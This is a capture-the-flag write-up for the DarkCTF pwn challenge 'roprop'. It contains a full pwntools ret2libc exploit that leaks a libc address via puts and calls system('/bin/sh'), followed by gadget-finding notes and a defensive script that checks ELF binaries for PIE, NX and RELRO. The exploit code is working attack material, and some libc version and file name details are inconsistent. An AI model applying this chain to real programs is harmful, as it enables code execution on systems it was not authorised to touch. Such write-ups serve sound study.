###### tags: `DarkCTF` `Pwn`

# Pwn/roprop

### description

- This is from the back Solar Designer times where you require rope to climb and get anything you want.
- nc pwn.darkarmy.xyz 5002
- File: https://mega.nz/file/esU1QYYT#GT9gsYhfv9Lp6UwTkJkeqcQqzyaW4h2rso84r2Pl-kQ

```python
from pwn import *

# libc used for the offsets below (glibc 2.23)
l = ELF('/../../lib/x86_64-linux-gnu/libc-2.23.so')
context.arch = "amd64"
context.log_level = "debug"

y = process("./roprop")

# gadgets and addresses inside the (non-PIE) binary
pop_rdi  = 0x400963   # pop rdi ; ret
puts_got = 0x601018   # GOT entry of puts
puts_plt = 0x400660   # PLT stub of puts
main     = 0x4008b2   # return to main after the leak so a second payload can be sent

# stage 1: puts(puts@got) leaks the runtime address of puts, then return to main
p = flat(b"a" * 88, pop_rdi, puts_got, puts_plt, main)
y.sendlineafter(b's.\n', p)
y.recvline()

# the leaked pointer is 6 bytes; pad to 8 and subtract the symbol offset to get the libc base
libc = u64(y.recv(6) + b'\0\0') - 0x6f6a0
success('libc -> %s' % hex(libc))
print('"/bin/sh" str:', hex(next(l.search(b'/bin/sh'))))

sysoff   = 0x453a0            # offset of system in this libc
sys_func = libc + sysoff
bin_sh   = libc + 0x18ce17    # offset of the "/bin/sh" string in this libc
ret      = 0x400646           # plain ret gadget (stack alignment); not used in the final chain

# stage 2: system("/bin/sh")
p = flat(b'a' * 88, pop_rdi, bin_sh, sys_func)
y.sendlineafter(b'\n', p)
y.interactive()
```

### ROP approach

- Find a `pop rdi ; ret` gadget
  - `ROPgadget --binary ./rop --only "pop|ret"`
- Find usable PLT entries (puts, main)
  - `objdump -d ./rop`
- Find a usable GOT entry (puts)
  - `objdump -R ./rop`
- Receive the leaked memory address
  - `libc = u64(y.recv(6) + b'\0\0') - <libc offset of the symbol whose GOT entry was leaked>`
- Find the libc puts offset
  - `readelf -s /lib/x86_64-linux-gnu/libc-2.27.so | grep 'puts'`
  - `objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep 'system'`
- Find /bin/sh
  - `print('"/bin/sh" str:', hex(next(l.search(b'/bin/sh'))))`
- Find the libc system offset
  - `readelf -s /lib/x86_64-linux-gnu/libc-2.27.so | grep 'system'`
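The chain above only works because the binary is linked at a fixed address (the gadget, PLT and GOT addresses are hard-coded) and the GOT stays readable and writable; PIE and full RELRO are exactly the build options that remove those preconditions. The following script is an added example, not part of this writeup or the challenge files: it parses the ELF64 header and program headers with the standard library only and reports whether PIE, NX and a RELRO segment are present, which is the check a defender would run on such a binary. The `build_elf` helper and the two sample images it produces are constructed for offline testing; the ELF constants are the standard specification values.

```python
import struct

# Standard ELF constants (from the ELF specification)
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X = 0x1

EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, 64 bytes, little-endian
PHDR = struct.Struct("<IIQQQQQQ")           # Elf64_Phdr, 56 bytes


def check_mitigations(data: bytes) -> dict:
    """Report the mitigations relevant to a ret2plt / ret2libc chain for an ELF64 image.

    pie   - e_type == ET_DYN: gadget, PLT and GOT addresses move on every run
    nx    - PT_GNU_STACK present without PF_X: the stack is not executable
    relro - PT_GNU_RELRO present: relocated data (the GOT under full RELRO) is made read-only
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    hdr = EHDR.unpack_from(data, 0)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]
    if e_phentsize != PHDR.size:
        raise ValueError("unexpected program header entry size")

    # no PT_GNU_STACK entry means the loader falls back to an executable stack, so nx stays False
    result = {"pie": e_type == ET_DYN, "nx": False, "relro": False}
    for i in range(e_phnum):
        p_type, p_flags = PHDR.unpack_from(data, e_phoff + i * e_phentsize)[:2]
        if p_type == PT_GNU_STACK:
            result["nx"] = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            result["relro"] = True
    return result


def build_elf(e_type: int, phdrs: list) -> bytes:
    """Constructed minimal ELF64 image (header plus program headers only) for offline tests."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + b"\x00" * 9   # ELF64, little-endian, version 1
    ehdr = EHDR.pack(ident, e_type, 0x3E, 1, 0x400000, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, len(phdrs), 0, 0, 0)
    body = b"".join(PHDR.pack(t, f, 0, 0, 0, 0, 0, 0x10) for t, f in phdrs)
    return ehdr + body


# Constructed samples: a non-PIE image like the challenge binary and a PIE rebuild of it.
FIXED_ADDRESS_IMAGE = build_elf(ET_EXEC, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])
PIE_IMAGE = build_elf(ET_DYN, [(PT_GNU_STACK, 0x6), (PT_GNU_RELRO, 0x4)])

if __name__ == "__main__":
    # To audit a real file instead: check_mitigations(open("./roprop", "rb").read())
    for name, image in (("fixed-address", FIXED_ADDRESS_IMAGE), ("pie", PIE_IMAGE)):
        print(name, check_mitigations(image))
```

A `pie: False` result is what makes hard-coded values such as `pop_rdi = 0x400963` usable across runs; `relro: True` alone only says a RELRO segment exists, and whether the GOT is actually read-only at the time `puts` is called depends on the dynamic section (`DT_BIND_NOW`), which this header-level check does not parse. Canary detection also needs the symbol table and is left out here.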